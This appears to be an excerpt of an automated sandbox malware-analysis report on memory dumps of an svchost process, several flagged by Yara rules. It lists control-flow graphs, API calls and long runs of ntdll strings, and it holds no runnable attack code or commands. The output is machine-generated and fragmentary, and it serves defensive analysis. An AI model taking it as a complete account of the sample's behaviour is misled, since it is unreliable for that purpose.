                                                                    • Source File: 00000009.00000002.1724645368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: VUUU$gfff
                                                                    • API String ID: 0-2662692612

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 237 417b13-417b2f 238 417b37-417b3c 237->238 239 417b32 call 42f633 237->239 240 417b42-417b50 call 42fc33 238->240 241 417b3e-417b41 238->241 239->238 244 417b60-417b71 call 42dfc3 240->244 245 417b52-417b5d call 42fed3 240->245 250 417b73-417b87 LdrLoadDll 244->250 251 417b8a-417b8d 244->251 245->244 250->251
                                                                    APIs
                                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417B85
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1724645368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Load
                                                                    • String ID:
                                                                    • API String ID: 2234796835-0

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 274 42c883-42c8bc call 404933 call 42dad3 NtClose
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1724645368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Close
                                                                    • String ID:
                                                                    • API String ID: 3535843008-0
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1724645368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • PostThreadMessageW.USER32(219X93M1i,00000111,00000000,00000000), ref: 0041442D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1724645368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: MessagePostThread
                                                                    • String ID: 219X93M1i$219X93M1i
                                                                    • API String ID: 1836367815-3254477705

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 14 4143b1-4143d1 call 42e9d3 17 4143d7-41441e call 417b13 call 4048a3 call 425123 14->17 18 4143d2 call 42f3e3 14->18 25 414440-414445 17->25 26 414420-414431 PostThreadMessageW 17->26 18->17 26->25 27 414433-41443d 26->27 27->25
                                                                    APIs
                                                                    • PostThreadMessageW.USER32(219X93M1i,00000111,00000000,00000000), ref: 0041442D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1724645368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: MessagePostThread
                                                                    • String ID: 219X93M1i$219X93M1i
                                                                    • API String ID: 1836367815-3254477705

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 28 4143b3-4143c3 29 4143cc-4143d1 28->29 30 4143c7 call 42e9d3 28->30 31 4143d7-41441e call 417b13 call 4048a3 call 425123 29->31 32 4143d2 call 42f3e3 29->32 30->29 39 414440-414445 31->39 40 414420-414431 PostThreadMessageW 31->40 32->31 40->39 41 414433-41443d 40->41 41->39
                                                                    APIs
                                                                    • PostThreadMessageW.USER32(219X93M1i,00000111,00000000,00000000), ref: 0041442D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1724645368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: MessagePostThread
                                                                    • String ID: 219X93M1i$219X93M1i
                                                                    • API String ID: 1836367815-3254477705

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 42 42cc03-42cc44 call 404933 call 42dad3 RtlFreeHeap
                                                                    APIs
                                                                    • RtlFreeHeap.NTDLL(00000000,00000004,00000000,FFFFFFFF,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042CC3F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1724645368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FreeHeap
                                                                    • String ID: ^hA
                                                                    • API String ID: 3298025750-899435009

                                                                    Control-flow Graph

                                                                    control_flow_graph 252 417b08-417b0c 253 417b6d-417b71 252->253 254 417b0e-417b3c call 42f633 252->254 256 417b73-417b87 LdrLoadDll 253->256 257 417b8a-417b8d 253->257 259 417b42-417b50 call 42fc33 254->259 260 417b3e-417b41 254->260 256->257 263 417b60-417b71 call 42dfc3 259->263 264 417b52-417b5d call 42fed3 259->264 263->256 263->257 264->263
                                                                    APIs
                                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417B85
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1724645368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Load
                                                                    • String ID:
                                                                    • API String ID: 2234796835-0

                                                                    Control-flow Graph

                                                                    control_flow_graph 269 42cbb3-42cbf4 call 404933 call 42dad3 RtlAllocateHeap
                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(?,0041E87B,?,?,00000000,?,0041E87B,?,?,?), ref: 0042CBEF
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1724645368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 1279760036-0
                                                                    APIs
                                                                    • ExitProcess.KERNEL32(?,00000000,00000000,?,01329089,?,00000001,01329089), ref: 0042CC84
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1724645368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExitProcess
                                                                    • String ID:
                                                                    • API String ID: 621844428-0
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                    • API String ID: 0-2160512332
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ApphelpCheckModule$Could not locate procedure "%s" in the shim engine DLL$LdrpGetShimEngineInterface$SE_DllLoaded$SE_DllUnloaded$SE_GetProcAddressForCaller$SE_InitializeEngine$SE_InstallAfterInit$SE_InstallBeforeInit$SE_LdrEntryRemoved$SE_LdrResolveDllName$SE_ProcessDying$SE_ShimDllLoaded$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                    • API String ID: 0-3089669407
                                                                    Strings
                                                                    • 8, xrefs: 036A52E3
                                                                    • Invalid debug info address of this critical section, xrefs: 036A54B6
                                                                    • double initialized or corrupted critical section, xrefs: 036A5508
                                                                    • corrupted critical section, xrefs: 036A54C2
                                                                    • Thread is in a state in which it cannot own a critical section, xrefs: 036A5543
                                                                    • Critical section debug info address, xrefs: 036A541F, 036A552E
                                                                    • Critical section address, xrefs: 036A5425, 036A54BC, 036A5534
                                                                    • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 036A54CE
                                                                    • Critical section address., xrefs: 036A5502
                                                                    • undeleted critical section in freed memory, xrefs: 036A542B
                                                                    • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 036A540A, 036A5496, 036A5519
                                                                    • IrwIrw@4rw@4rw, xrefs: 036A5341, 036A534D
                                                                    • Address of the debug info found in the active list., xrefs: 036A54AE, 036A54FA
                                                                    • Thread identifier, xrefs: 036A553A
                                                                    • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 036A54E2
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory$IrwIrw@4rw@4rw
                                                                    • API String ID: 0-3353328696
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $!$%$%%%u$%%%u!%s!$0$9$h$l$w
                                                                    • API String ID: 0-360209818
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                                    • API String ID: 0-3591852110
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                                    • API String ID: 0-3197712848
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                                    • API String ID: 0-3532704233
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                                                    • API String ID: 0-1357697941
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                                                    • API String ID: 0-3063724069
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                    • API String ID: 0-1700792311
                                                                    Strings
                                                                    • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 0362D0CF
                                                                    • Control Panel\Desktop\LanguageConfiguration, xrefs: 0362D196
                                                                    • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 0362D146
                                                                    • @, xrefs: 0362D2AF
                                                                    • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 0362D2C3
                                                                    • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 0362D262
                                                                    • @, xrefs: 0362D0FD
                                                                    • @, xrefs: 0362D313
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                                    • API String ID: 0-1356375266
                                                                    Strings
                                                                    • sxsisol_SearchActCtxForDllName, xrefs: 036976DD
                                                                    • @, xrefs: 03649EE7
                                                                    • [%x.%x] SXS: %s - Relative redirection plus env var expansion., xrefs: 036976EE
                                                                    • minkernel\ntdll\sxsisol.cpp, xrefs: 03697713, 036978A4
                                                                    • Internal error check failed, xrefs: 03697718, 036978A9
                                                                    • Status != STATUS_NOT_FOUND, xrefs: 0369789A
                                                                    • !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT), xrefs: 03697709
                                                                    • String ID: !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT)$@$Internal error check failed$Status != STATUS_NOT_FOUND$[%x.%x] SXS: %s - Relative redirection plus env var expansion.$minkernel\ntdll\sxsisol.cpp$sxsisol_SearchActCtxForDllName
                                                                    • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                    • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                    • String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI
                                                                    • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                    • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                    Strings
                                                                    • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 036A2180
                                                                    • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 036A2178
                                                                    • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 036A21BF
                                                                    • RtlGetAssemblyStorageRoot, xrefs: 036A2160, 036A219A, 036A21BA
                                                                    • SXS: %s() passed the empty activation context, xrefs: 036A2165
                                                                    • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 036A219F
                                                                    • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                    Strings
                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 0366C6C3
                                                                    • Unable to build import redirection Table, Status = 0x%x, xrefs: 036A81E5
                                                                    • LdrpInitializeImportRedirection, xrefs: 036A8177, 036A81EB
                                                                    • LdrpInitializeProcess, xrefs: 0366C6C4
                                                                    • minkernel\ntdll\ldrredirect.c, xrefs: 036A8181, 036A81F5
                                                                    • Loading import redirection DLL: '%wZ', xrefs: 036A8170
                                                                    • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                    • String ID: @$AVRF: Verifier .dlls must not have thread locals$KnownDllPath$L$\KnownDlls32
                                                                    • String ID: $ $Internal error check failed$Status != STATUS_SXS_SECTION_NOT_FOUND$minkernel\ntdll\sxsisol.cpp
                                                                    Strings
                                                                    • WindowsExcludedProcs, xrefs: 0365522A
                                                                    • Kernel-MUI-Language-Disallowed, xrefs: 03655352
                                                                    • Kernel-MUI-Number-Allowed, xrefs: 03655247
                                                                    • Kernel-MUI-Language-Allowed, xrefs: 0365527B
                                                                    • Kernel-MUI-Language-SKU, xrefs: 0365542B
                                                                    • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                    • String ID: .DLL$.Local$/$\$\microsoft.system.package.metadata\Application
                                                                    • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                    • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                                    • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                    • String ID: $HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                    • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                                                    • String ID: $HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                    Strings
                                                                    • SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p, xrefs: 03697D39
                                                                    • RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section., xrefs: 03697D03
                                                                    • SsHd, xrefs: 0364A885
                                                                    • SXS: String hash collision chain offset at %p (= %ld) out of bounds, xrefs: 03697D56
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section.$SXS: String hash collision chain offset at %p (= %ld) out of bounds$SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p$SsHd
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                    Strings
                                                                    • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 036954ED
                                                                    • HEAP[%wZ]: , xrefs: 036954D1, 03695592
                                                                    • HEAP: , xrefs: 036954E0, 036955A1
                                                                    • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 036955AE
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                                    Strings
                                                                    • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 036A21D9, 036A22B1
                                                                    • SXS: %s() passed the empty activation context, xrefs: 036A21DE
                                                                    • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 036A22B6
                                                                    • .Local, xrefs: 036628D8
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                    Strings
                                                                    • HEAP[%wZ]: , xrefs: 0368F8AA
